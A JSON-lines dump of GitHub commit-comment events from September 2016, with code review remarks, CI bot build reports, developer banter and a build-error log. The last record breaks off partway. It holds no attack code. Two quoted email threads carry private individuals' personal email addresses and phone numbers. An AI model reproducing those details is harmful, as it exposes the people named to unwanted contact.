{"id":"4586017204","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"MisterAndry/sbt_dz3"},"payload":{"comment":{"id":19085978,"position":20,"line":20,"path":"PrintLines.java","commit_id":"24ef14b2e91121cb62490753d2c14fbab29abb62","created_at":"2016-09-19T21:21:56Z","updated_at":"2016-09-19T21:21:56Z","body":"Попробуйте использовать информацию о том, что средняя длина строки файла задана. Можно из этого предположения (+ предположение о кодировке символов) понять сколько строк находится в файле => использовать эту информацию в ArrayList'е"}},"created_at":"2016-09-19T21:21:56Z"}
{"id":"4586017361","type":"CommitCommentEvent","actor":{"login":"daoud59350"},"repo":{"name":"PokeBotPub/PokeBot-Android"},"payload":{"comment":{"id":19085979,"position":43,"line":203,"path":"forTranslators.xml","commit_id":"7770c7657ac2acb2137313f5318169e247dc7c6f","created_at":"2016-09-19T21:21:58Z","updated_at":"2016-09-19T21:21:58Z","body":"Test fr"}},"created_at":"2016-09-19T21:21:58Z"}
{"id":"4586019039","type":"CommitCommentEvent","actor":{"login":"riccardi"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19085986,"position":27,"line":27,"path":"browser/js/adminUser/adminUsers.html","commit_id":"d8581c1b1da808c23aba117f30d5ffc864952592","created_at":"2016-09-19T21:22:16Z","updated_at":"2016-09-19T21:22:16Z","body":"There seems to be lots of repetition in our adminUsers.html, adminOrders.html, and adminFriends.html. Maybe we can make a directive instead?"}},"created_at":"2016-09-19T21:22:16Z"}
{"id":"4586020718","type":"CommitCommentEvent","actor":{"login":"lGuillaume124"},"repo":{"name":"Sonerezh/sonerezh"},"payload":{"comment":{"id":19085988,"position":null,"line":null,"path":null,"commit_id":"9ad6488b890470368ae5714062cb7200bc166c95","created_at":"2016-09-19T21:22:35Z","updated_at":"2016-09-19T21:22:35Z","body":"Oh! I was too fast. I didn't see it has to be sorted by band, then by album. I will fix this tomorrow ;)"}},"created_at":"2016-09-19T21:22:35Z"}
{"id":"4586020957","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19085989,"position":52,"line":58,"path":"src/Control/TimeWarp/Timed/MonadTimed.hs","commit_id":"2a2a1450d8e983b7ef4ca56e21e1807a7a3b5285","created_at":"2016-09-19T21:22:38Z","updated_at":"2016-09-19T21:22:38Z","body":"How will it be done instead?"}},"created_at":"2016-09-19T21:22:38Z"}
{"id":"4586026278","type":"CommitCommentEvent","actor":{"login":"Serg-Norseman"},"repo":{"name":"Serg-Norseman/CalendarConverter"},"payload":{"comment":{"id":19085997,"position":21,"line":220,"path":"CalendarConverterTests/UDNTests.cs","commit_id":"c27427ae830add3b739f7cfba1986a20f69e9a52","created_at":"2016-09-19T21:23:38Z","updated_at":"2016-09-19T21:23:38Z","body":"The top two lines of the test still do not pass. However, 500 years later - it's all ok."}},"created_at":"2016-09-19T21:23:38Z"}
{"id":"4586027214","type":"CommitCommentEvent","actor":{"login":"malucooo"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19086003,"position":null,"line":null,"path":null,"commit_id":"96759122e82ea3d471fcb1f9780c3879a2fa162c","created_at":"2016-09-19T21:23:49Z","updated_at":"2016-09-19T21:23:49Z","body":"great!"}},"created_at":"2016-09-19T21:23:49Z"}
{"id":"4586029740","type":"CommitCommentEvent","actor":{"login":"MightyCreak"},"repo":{"name":"Sonerezh/sonerezh"},"payload":{"comment":{"id":19086008,"position":15,"line":169,"path":"app/Controller/SongsController.php","commit_id":"9ad6488b890470368ae5714062cb7200bc166c95","created_at":"2016-09-19T21:24:16Z","updated_at":"2016-09-19T21:24:16Z","body":"Maybe use `//` instead of `#` for the comment. Knowing PHP it might work, but it's not really standard.\r\nAlso maybe a month or a year is good enough for an expiration time."}},"created_at":"2016-09-19T21:24:16Z"}
{"id":"4586031919","type":"CommitCommentEvent","actor":{"login":"aldanor"},"repo":{"name":"dean0x7d/pybind11"},"payload":{"comment":{"id":19086012,"position":89,"line":176,"path":"include/pybind11/pytypes.h","commit_id":"088db874a9bdb2f415b2aab2bba6edcf167c1cbe","created_at":"2016-09-19T21:24:41Z","updated_at":"2016-09-19T21:24:41Z","body":"What if the attribute has been set to something else, externally?"}},"created_at":"2016-09-19T21:24:41Z"}
{"id":"4586037339","type":"CommitCommentEvent","actor":{"login":"brodee"},"repo":{"name":"magefree/mage"},"payload":{"comment":{"id":19086031,"position":null,"line":null,"path":null,"commit_id":"dba0f14591d3747684a9b2aa30b4edf8a3192cfc","created_at":"2016-09-19T21:25:42Z","updated_at":"2016-09-19T21:25:42Z","body":"Just kick me out for now and I'll do a second pull request when I get home. I have to work for another 10 hours"}},"created_at":"2016-09-19T21:25:42Z"}
{"id":"4586037432","type":"CommitCommentEvent","actor":{"login":"mutec"},"repo":{"name":"MysteryCode/de.mysterycode.translate"},"payload":{"comment":{"id":19086034,"position":5,"line":117,"path":"template/packageAdd.tpl","commit_id":"3fe99d2052467846ad5ab04b6d82e789284ba95c","created_at":"2016-09-19T21:25:43Z","updated_at":"2016-09-19T21:25:43Z","body":"fixed that 😆 "}},"created_at":"2016-09-19T21:25:43Z"}
{"id":"4586040023","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19086039,"position":null,"line":null,"path":null,"commit_id":"083cc97b8b3a5fdef870e94860021684d77ed706","created_at":"2016-09-19T21:26:11Z","updated_at":"2016-09-19T21:26:11Z","body":"Commit reverted here:\r\nhttps://github.com/OpenViX/enigma2/commit/65fb9480ece9d5761873f70a302bf068d1011f3d"}},"created_at":"2016-09-19T21:26:11Z"}
{"id":"4586040285","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19086040,"position":null,"line":null,"path":null,"commit_id":"f091781495f2e4d774a8bde8ff35f4e2de6aafa5","created_at":"2016-09-19T21:26:14Z","updated_at":"2016-09-19T21:26:14Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2309 of 2475 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f091781495f2e4d774a8bde8ff35f4e2de6aafa5-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f091781495f2e4d774a8bde8ff35f4e2de6aafa5-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.29%25-yellow.svg)</a> \n"}},"created_at":"2016-09-19T21:26:14Z"}
{"id":"4586041661","type":"CommitCommentEvent","actor":{"login":"cgeroux"},"repo":{"name":"cgeroux/salt-formula-hadoop"},"payload":{"comment":{"id":19086046,"position":null,"line":null,"path":null,"commit_id":"cdf21985c17a4bb945138c53c7797f435edddc18","created_at":"2016-09-19T21:26:28Z","updated_at":"2016-09-19T21:26:28Z","body":"The \"previous change\" refers to a different repo. namely the heat-hadoop-spark repo."}},"created_at":"2016-09-19T21:26:28Z"}
{"id":"4586041846","type":"CommitCommentEvent","actor":{"login":"s123594"},"repo":{"name":"s123594/modellingProject"},"payload":{"comment":{"id":19086047,"position":null,"line":null,"path":null,"commit_id":"f619d85489d523abe82b709a6d5c7a14d83d70cd","created_at":"2016-09-19T21:26:31Z","updated_at":"2016-09-19T21:26:31Z","body":"I see. This I can correct by only changing the function masking 2d. i will have to find some clever features though. \r\nI might also smooth the edges as well, but I will discuss this with you on wednesday.\r\nThank you for the corrections!"}},"created_at":"2016-09-19T21:26:31Z"}
{"id":"4586045631","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"AlexeyDomnin/SberRepo"},"payload":{"comment":{"id":19086064,"position":18,"line":18,"path":"src/ru/sberbank/javaschool/hometask3/Task2.java","commit_id":"a0e3225cb5f13ed41557c61f38f6fa266061b149","created_at":"2016-09-19T21:27:12Z","updated_at":"2016-09-19T21:27:12Z","body":"Слишком сложно написано условие - вложенная тернарная операция + можно обойтись только одной проверкой на длину строки."}},"created_at":"2016-09-19T21:27:12Z"}
{"id":"4586045802","type":"CommitCommentEvent","actor":{"login":"titan73"},"repo":{"name":"wine-compholio/wine-staging"},"payload":{"comment":{"id":19086065,"position":null,"line":null,"path":null,"commit_id":"c08a9ab0d60c368326c699304d91d020ca96d364","created_at":"2016-09-19T21:27:14Z","updated_at":"2016-09-19T21:27:14Z","body":"Typo win23 -> win32."}},"created_at":"2016-09-19T21:27:14Z"}
{"id":"4586047123","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19086069,"position":null,"line":null,"path":null,"commit_id":"1ad365fd035bbc7ad13dc97986694fa8342a334e","created_at":"2016-09-19T21:27:28Z","updated_at":"2016-09-19T21:27:28Z","body":"5665-coincident-plant-bug (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ad365fd035bbc7ad13dc97986694fa8342a334e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-19T21:27:28Z"}
{"id":"4586051343","type":"CommitCommentEvent","actor":{"login":"ivlis"},"repo":{"name":"ivlis/docker-alpine-postgres"},"payload":{"comment":{"id":19086078,"position":null,"line":null,"path":null,"commit_id":"e65b2e6eae16a547bcd2a0018234b91708399e35","created_at":"2016-09-19T21:28:16Z","updated_at":"2016-09-19T21:28:16Z","body":"Thanks!"}},"created_at":"2016-09-19T21:28:16Z"}
{"id":"4586052064","type":"CommitCommentEvent","actor":{"login":"Roboe"},"repo":{"name":"WeAreFairphone/fprsmap"},"payload":{"comment":{"id":19086080,"position":null,"line":null,"path":null,"commit_id":"68078838af1f026f4c987e48404f53714dccf1c3","created_at":"2016-09-19T21:28:24Z","updated_at":"2016-09-19T21:28:24Z","body":"That seems to be the case\r\n\r\nPS: w3schools has no relation with w3c"}},"created_at":"2016-09-19T21:28:24Z"}
{"id":"4586055121","type":"CommitCommentEvent","actor":{"login":"johnweldon"},"repo":{"name":"go-ldap/ldap"},"payload":{"comment":{"id":19086088,"position":196,"line":196,"path":"example_test.go","commit_id":"e6cf29f660d821b39fbac571716c4dbcc1664a7a","created_at":"2016-09-19T21:28:58Z","updated_at":"2016-09-19T21:28:58Z","body":"Yes.  This is example code, and you are correct, in real usage this would be supplied by user input most likely."}},"created_at":"2016-09-19T21:28:58Z"}
{"id":"4586056014","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19086089,"position":13,"line":13,"path":"browser/js/admin/admin.factory.js","commit_id":"deaee48e5825249168239d10bd6a05abfcf49aff","created_at":"2016-09-19T21:29:09Z","updated_at":"2016-09-19T21:29:09Z","body":"you do not want to catch the error here "}},"created_at":"2016-09-19T21:29:09Z"}
{"id":"4586057139","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"AlexeyDomnin/SberRepo"},"payload":{"comment":{"id":19086091,"position":27,"line":27,"path":"src/ru/sberbank/javaschool/hometask3/Task4.java","commit_id":"a0e3225cb5f13ed41557c61f38f6fa266061b149","created_at":"2016-09-19T21:29:19Z","updated_at":"2016-09-19T21:29:19Z","body":"Попробуйте переписать с использованием List + listIterator или Deque + descendingIterator"}},"created_at":"2016-09-19T21:29:19Z"}
{"id":"4586059328","type":"CommitCommentEvent","actor":{"login":"StefanBrand"},"repo":{"name":"WeAreFairphone/fprsmap"},"payload":{"comment":{"id":19086092,"position":null,"line":null,"path":null,"commit_id":"68078838af1f026f4c987e48404f53714dccf1c3","created_at":"2016-09-19T21:29:43Z","updated_at":"2016-09-19T21:29:43Z","body":"Oops... :blush: "}},"created_at":"2016-09-19T21:29:43Z"}
{"id":"4586061421","type":"CommitCommentEvent","actor":{"login":"carilevay"},"repo":{"name":"richfish/sfdata26_work"},"payload":{"comment":{"id":19086095,"position":null,"line":null,"path":null,"commit_id":"dc9df628f7beeedc6cd2e6566b98ccf9aa805bfa","created_at":"2016-09-19T21:30:09Z","updated_at":"2016-09-19T21:30:09Z","body":"No worries, Richard--if you can forgive the delayed feedback, I can forgive\nthe misspelling.\n\nOn Mon, Sep 19, 2016 at 2:20 PM, Rifisherr <notifications@github.com> wrote:\n\n> And apologies - I totally misspelled \"Cari\" . About to have my daily coffee\n> now.\n>\n> On Mon, Sep 19, 2016 at 2:14 PM, Richard Fisher <notifications@github.com>\n> wrote:\n>\n> > Hi Cary,\n> >\n> > No questions re the work. Thanks for taking time to review!\n> >\n> > Richard\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/richfish/sfdata26_work/commit/\n> dc9df628f7beeedc6cd2e6566b98ccf9aa805bfa#commitcomment-19085855>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/\n> AAp2HDVZGhZaeAy2SZhNKSh21iaDlXQZks5qrvtAgaJpZM4J-j9C>\n> > .\n> >\n>\n>\n>\n> --\n> rfisher@alumni.upenn.edu\n> (713) 906-5025\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/richfish/sfdata26_work/commit/dc9df628f7beeedc6cd2e6566b98ccf9aa805bfa#commitcomment-19085954>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AE3fpxO1eIXkJXV-mgxDE7Wk1vXrn2bRks5qrvyngaJpZM4J-j9C>\n> .\n>\n\n\n\n-- \nCari Levay\n650.823.3694\ncflevay@gmail.com\n"}},"created_at":"2016-09-19T21:30:09Z"}
{"id":"4586065438","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19086103,"position":null,"line":null,"path":null,"commit_id":"7440a10dea02a9331ad457fed8bbec30fd4df8a2","created_at":"2016-09-19T21:30:51Z","updated_at":"2016-09-19T21:30:51Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - i386-Windows-7-VisualStudio-12: Tests Failed (1764 of 2337 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7440a10dea02a9331ad457fed8bbec30fd4df8a2-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7440a10dea02a9331ad457fed8bbec30fd4df8a2-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.48%25-red.svg)</a> \n"}},"created_at":"2016-09-19T21:30:51Z"}
{"id":"4586067196","type":"CommitCommentEvent","actor":{"login":"touseeqreshi"},"repo":{"name":"touseeqreshi/ELI-WebSite"},"payload":{"comment":{"id":19086110,"position":null,"line":null,"path":null,"commit_id":"eb601e0123f24b31e91d6729eb475de883b17648","created_at":"2016-09-19T21:31:10Z","updated_at":"2016-09-19T21:31:10Z","body":"\r\n\r\n\r\n\r\n[elicuw-master.zip](https://github.com/touseeqreshi/ELI-WebSite/files/481169/elicuw-master.zip)\r\n"}},"created_at":"2016-09-19T21:31:10Z"}
{"id":"4586072808","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19086121,"position":null,"line":null,"path":null,"commit_id":"4f94b3d9b46732da1f541333a53a17b563c9eb59","created_at":"2016-09-19T21:32:13Z","updated_at":"2016-09-19T21:32:13Z","body":"Just accept tabs they are the future."}},"created_at":"2016-09-19T21:32:13Z"}
{"id":"4586075545","type":"CommitCommentEvent","actor":{"login":"Roboe"},"repo":{"name":"WeAreFairphone/fprsmap"},"payload":{"comment":{"id":19086127,"position":null,"line":null,"path":null,"commit_id":"68078838af1f026f4c987e48404f53714dccf1c3","created_at":"2016-09-19T21:32:43Z","updated_at":"2016-09-19T21:32:43Z","body":"Oh, I also mixed up HTML with XHTML, in fact... `<meta>` was never an autoclosing tag, 😳 ([HTML4 reference](https://www.w3.org/TR/html401/struct/global.html#h-7.4.4.2)) "}},"created_at":"2016-09-19T21:32:43Z"}
{"id":"4586076471","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"AlexeyDomnin/SberRepo"},"payload":{"comment":{"id":19086129,"position":18,"line":18,"path":"src/ru/sberbank/javaschool/hometask3/Task6.java","commit_id":"a0e3225cb5f13ed41557c61f38f6fa266061b149","created_at":"2016-09-19T21:32:53Z","updated_at":"2016-09-19T21:32:53Z","body":"Здесь можно использовать информацию о средней длине строки (правда придётся добавить предположение о кодировке файла). Т.е. сначала сделать предположение о числе строк, а потом использовать при работе с ArrayList'ом"}},"created_at":"2016-09-19T21:32:53Z"}
{"id":"4586076743","type":"CommitCommentEvent","actor":{"login":"mansenfranzen"},"repo":{"name":"mansenfranzen/ultimate"},"payload":{"comment":{"id":19086132,"position":14,"line":26,"path":"django/app_tutorial/models.py","commit_id":"bacde997e9999d1b807dde17bbfd5688cf435137","created_at":"2016-09-19T21:32:55Z","updated_at":"2016-09-19T21:32:55Z","body":"Schau mal unter Material - habe das DB Schema angepasst.\n\nOn 19.09.2016 18:17, PlusMinus0 wrote:\n>\n> Mit Heim Mannschaft meine ich die Mannschaft, die zuerst im Spielplan \n> auftaucht. Üblicherweise ist das die höher gesetzte Mannschaft, muss \n> aber nicht so sein. Man könnte bei Game TeamHome und TeamAway als \n> Fremdschlüssel einfügen und dann bei GameScore nur Game als \n> Fremschlüssel, dafür ScoreHome und ScoreAway.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/mansenfranzen/ultimate/commit/bacde997e9999d1b807dde17bbfd5688cf435137#commitcomment-19081229>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/ARP5JLQmkE2769_NnLKgl4uptPz6UV8Eks5qrrWXgaJpZM4KAQNI>.\n>\n\n"}},"created_at":"2016-09-19T21:32:55Z"}
{"id":"4586078104","type":"CommitCommentEvent","actor":{"login":"Andrew-Orlov"},"repo":{"name":"VirtoCommerce/vc-content"},"payload":{"comment":{"id":19086136,"position":null,"line":null,"path":null,"commit_id":"da550dde999fce8b1c08302a614ddb838a7b50dd","created_at":"2016-09-19T21:33:11Z","updated_at":"2016-09-19T21:33:11Z","body":"@Woland2k Yes. There should be some changes in markup: instead of background image of `<a>` there will be placed an image tag. Will make them with Mikhail Chirsky tomorrow."}},"created_at":"2016-09-19T21:33:11Z"}
{"id":"4586080257","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19086140,"position":null,"line":null,"path":null,"commit_id":"4f94b3d9b46732da1f541333a53a17b563c9eb59","created_at":"2016-09-19T21:33:34Z","updated_at":"2016-09-19T21:33:34Z","body":"Kind of link Mandarin Chinese is going to be the future? Or what about Javascript? OR don't forget bugs being the future food? :8ball: "}},"created_at":"2016-09-19T21:33:34Z"}
{"id":"4586082059","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19086145,"position":null,"line":null,"path":null,"commit_id":"4f94b3d9b46732da1f541333a53a17b563c9eb59","created_at":"2016-09-19T21:33:55Z","updated_at":"2016-09-19T21:33:55Z","body":"I refuse to accept the norm!"}},"created_at":"2016-09-19T21:33:55Z"}
{"id":"4586083896","type":"CommitCommentEvent","actor":{"login":"Jets42"},"repo":{"name":"drj11/shell"},"payload":{"comment":{"id":19086154,"position":null,"line":null,"path":null,"commit_id":"9c64a9792e9141c0bd600831d1b7d87c5cb6dbe6","created_at":"2016-09-19T21:34:17Z","updated_at":"2016-09-19T21:34:17Z","body":"You said:   in POSIX this is supposed to set the variable:\r\n +CODE\r\n +a=b :\r\n +/CODE\r\n\r\nIn POSIX, saying  $ VAR=valstr V2=stuff  SomeCommand\r\nis supposed to make a TEMPorary assignment to the variable(s) that is only visible \r\nfor the $ENV vars available to \"SomeCommand\" (and it's child procs)\r\nAfter the command has finished executing, the value for VAR and V2 are\r\nsupposed to be un-changed, and return to any value they had before the line above executes.\r\nIn this context, the \":\" is used as the shell's NULL or NOP command... so your value for a=b IS\r\nprobably being set (for a brief moment), and then dropped by the time you check on subsequent lines."}},"created_at":"2016-09-19T21:34:17Z"}
{"id":"4586084276","type":"CommitCommentEvent","actor":{"login":"pdanilchik"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19086155,"position":null,"line":null,"path":null,"commit_id":"195de287f2fe68baf510ce77b28b4a129aa4d24e","created_at":"2016-09-19T21:34:22Z","updated_at":"2016-09-19T21:34:22Z","body":"...sorry, I found it.  **sudo apt-get install linux-dtb-dev-sunxi** , for those who need it.  Subsequently it, along with other orange .dtb files, can be found within /boot/dtb/ )."}},"created_at":"2016-09-19T21:34:22Z"}
{"id":"4586084407","type":"CommitCommentEvent","actor":{"login":"mathebox"},"repo":{"name":"Strassengezwitscher/Strassengezwitscher"},"payload":{"comment":{"id":19086157,"position":4,"line":47,"path":"crowdgezwitscher/crowdgezwitscher/urls.py","commit_id":"b1f933fe34370354c4f10bc518ea92f69c30cd85","created_at":"2016-09-19T21:34:24Z","updated_at":"2016-09-19T21:34:24Z","body":"Reicht nicht auch `views.index`? Dann brauchen wir keine extra Methode in der `views.py`."}},"created_at":"2016-09-19T21:34:24Z"}
{"id":"4586085078","type":"CommitCommentEvent","actor":{"login":"Woland2k"},"repo":{"name":"VirtoCommerce/vc-content"},"payload":{"comment":{"id":19086159,"position":null,"line":null,"path":null,"commit_id":"da550dde999fce8b1c08302a614ddb838a7b50dd","created_at":"2016-09-19T21:34:30Z","updated_at":"2016-09-19T21:34:30Z","body":"@Andrew-Orlov not only logo image didn't work with updated blog, but other images as well (actually about 20 of them)."}},"created_at":"2016-09-19T21:34:30Z"}
{"id":"4586086801","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19086161,"position":null,"line":null,"path":null,"commit_id":"1ad365fd035bbc7ad13dc97986694fa8342a334e","created_at":"2016-09-19T21:34:51Z","updated_at":"2016-09-19T21:34:51Z","body":"5665-coincident-plant-bug (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2373 of 2373 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ad365fd035bbc7ad13dc97986694fa8342a334e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ad365fd035bbc7ad13dc97986694fa8342a334e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-19T21:34:51Z"}
{"id":"4586088738","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19086164,"position":null,"line":null,"path":null,"commit_id":"4f94b3d9b46732da1f541333a53a17b563c9eb59","created_at":"2016-09-19T21:35:14Z","updated_at":"2016-09-19T21:35:14Z","body":"Dude no ones making you eat bugs, unless they tab 5han you must eat the."}},"created_at":"2016-09-19T21:35:14Z"}
{"id":"4586092730","type":"CommitCommentEvent","actor":{"login":"sombree"},"repo":{"name":"CyanogenMod/android_device_samsung_jf-common"},"payload":{"comment":{"id":19086172,"position":null,"line":null,"path":null,"commit_id":"6db2dd5b6e99e1996d38315716c032dc652ddc8a","created_at":"2016-09-19T21:36:02Z","updated_at":"2016-09-19T21:36:02Z","body":"I think that this http://review.cyanogenmod.org/#/c/162475/ applies to CM13 as well."}},"created_at":"2016-09-19T21:36:02Z"}
{"id":"4586096721","type":"CommitCommentEvent","actor":{"login":"liggitt"},"repo":{"name":"go-ldap/ldap"},"payload":{"comment":{"id":19086178,"position":196,"line":196,"path":"example_test.go","commit_id":"e6cf29f660d821b39fbac571716c4dbcc1664a7a","created_at":"2016-09-19T21:36:50Z","updated_at":"2016-09-19T21:36:50Z","body":"The example should probably wrap the value in `EscapeFilter` before passing it to sprintf"}},"created_at":"2016-09-19T21:36:50Z"}
{"id":"4586096846","type":"CommitCommentEvent","actor":{"login":"polettix"},"repo":{"name":"jhthorsen/mojolicious-plugin-openapi"},"payload":{"comment":{"id":19086180,"position":19,"line":382,"path":"lib/Mojolicious/Plugin/OpenAPI.pm","commit_id":"4406a27cdcf16017a07fb350d08e3103d9dfc3f1","created_at":"2016-09-19T21:36:52Z","updated_at":"2016-09-19T21:36:52Z","body":"*registers"}},"created_at":"2016-09-19T21:36:52Z"}
{"id":"4586097651","type":"CommitCommentEvent","actor":{"login":"Tee7even"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":19086184,"position":null,"line":null,"path":null,"commit_id":"eeda3a7fa745e5976b331e296f69e8e158662977","created_at":"2016-09-19T21:37:01Z","updated_at":"2016-09-19T21:37:01Z","body":"👍 "}},"created_at":"2016-09-19T21:37:01Z"}
{"id":"4586097887","type":"CommitCommentEvent","actor":{"login":"TheNeikos"},"repo":{"name":"lfairy/maud"},"payload":{"comment":{"id":19086185,"position":null,"line":null,"path":null,"commit_id":"9c35cc557e433fb466ec717770bbd54b060e4ca9","created_at":"2016-09-19T21:37:04Z","updated_at":"2016-09-19T21:37:04Z","body":"Could you please publish these fixes?"}},"created_at":"2016-09-19T21:37:04Z"}
{"id":"4586098397","type":"CommitCommentEvent","actor":{"login":"cxj"},"repo":{"name":"Level-2/Transphporm"},"payload":{"comment":{"id":19086187,"position":null,"line":null,"path":null,"commit_id":"b867beb88428f9120c34e9e6e9639a9ee56df0ed","created_at":"2016-09-19T21:37:09Z","updated_at":"2016-09-19T21:37:09Z","body":"There seems to be a problem with partials getting this wrapper inserted (and not removed?):\r\n\r\n```xml\r\n<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\" \"http://www.w3.org/TR/REC-html40/loose.dtd\">\r\n<html><body>\r\n```"}},"created_at":"2016-09-19T21:37:09Z"}
{"id":"4586100158","type":"CommitCommentEvent","actor":{"login":"elazarg"},"repo":{"name":"python/mypy"},"payload":{"comment":{"id":19086194,"position":16,"line":843,"path":"mypy/test/data/check-classes.test","commit_id":"9dd1086e76c4d62011c2ff1479abae30565c6db2","created_at":"2016-09-19T21:37:29Z","updated_at":"2016-09-19T21:37:29Z","body":"Here's a problematic version:\r\n```Python\r\nclass A:\r\n    def __add__(self, x: 'B') -> int: ...\r\n\r\nclass B: pass\r\n\r\nclass B1(B): pass\r\n\r\ndef f(a: A, b: B1) -> int:\r\n    return a + b  # good?\r\n\r\n\r\nclass A1(A):\r\n    @overload  # E: Signature of \"__add__\" incompatible with supertype \"A\"\r\n    def __add__(self, x: B) -> int: pass\r\n    @overload\r\n    def __add__(self, x: B1) -> str: pass\r\n\r\nf(A1(), B1())  # ouch, returns str, not int\r\n```\r\nThis looks like a similar problem to covariance in method parameters.\r\n\r\nI think we should test for the erroneous case, not mirror the checks in the code."}},"created_at":"2016-09-19T21:37:29Z"}
{"id":"4586100597","type":"CommitCommentEvent","actor":{"login":"hkimura"},"repo":{"name":"pmem/ndctl"},"payload":{"comment":{"id":19086198,"position":8,"line":9,"path":"README.md","commit_id":"85428ad1f1326a00aedcbc09f20508e0fece1ad1","created_at":"2016-09-19T21:37:34Z","updated_at":"2016-09-19T21:37:34Z","body":"Doesn't this line depend on the environment?\r\nI guess it's better to say something like:\r\n```\r\n<run configure using the command line recommended at the end of autogen>\r\ne.g., ./configure CFLAGS='-g -O0' --prefix=/usr --sysconfdir=/etc --libdir=/usr/lib64\r\n```\r\n\r\nIn my case (x64, RHEL7.2), `./configure --enable-local` and make/install resulted in a missing shared library error as follows:\r\n\r\n```\r\n[kimurhid@nvdb-pa4 lib]$ ndctl --version\r\nndctl: error while loading shared libraries: libndctl.so.6: cannot open shared object file: No such file or directory\r\n[kimurhid@nvdb-pa4 lib]$ ldd libndctl.so\r\n        linux-vdso.so.1 =>  (0x00007fffd06e7000)\r\n        libdaxctl.so.1 => not found\r\n        libudev.so.1 => /lib64/libudev.so.1 (0x00007f662c124000)\r\n        libuuid.so.1 => /lib64/libuuid.so.1 (0x00007f662bf1f000)\r\n        libkmod.so.2 => /lib64/libkmod.so.2 (0x00007f662bd09000)\r\n        libc.so.6 => /lib64/libc.so.6 (0x00007f662b946000)\r\n        librt.so.1 => /lib64/librt.so.1 (0x00007f662b73e000)\r\n        libcap.so.2 => /lib64/libcap.so.2 (0x00007f662b539000)\r\n        libm.so.6 => /lib64/libm.so.6 (0x00007f662b236000)\r\n        libdw.so.1 => /lib64/libdw.so.1 (0x00007f662afef000)\r\n        libdl.so.2 => /lib64/libdl.so.2 (0x00007f662adeb000)\r\n        libgcc_s.so.1 => /lib64/libgcc_s.so.1 (0x00007f662abd4000)\r\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x00007f662a9b8000)\r\n        /lib64/ld-linux-x86-64.so.2 (0x0000560c7d484000)\r\n        liblzma.so.5 => /lib64/liblzma.so.5 (0x00007f662a793000)\r\n        libz.so.1 => /lib64/libz.so.1 (0x00007f662a57c000)\r\n        libattr.so.1 => /lib64/libattr.so.1 (0x00007f662a377000)\r\n        libelf.so.1 => 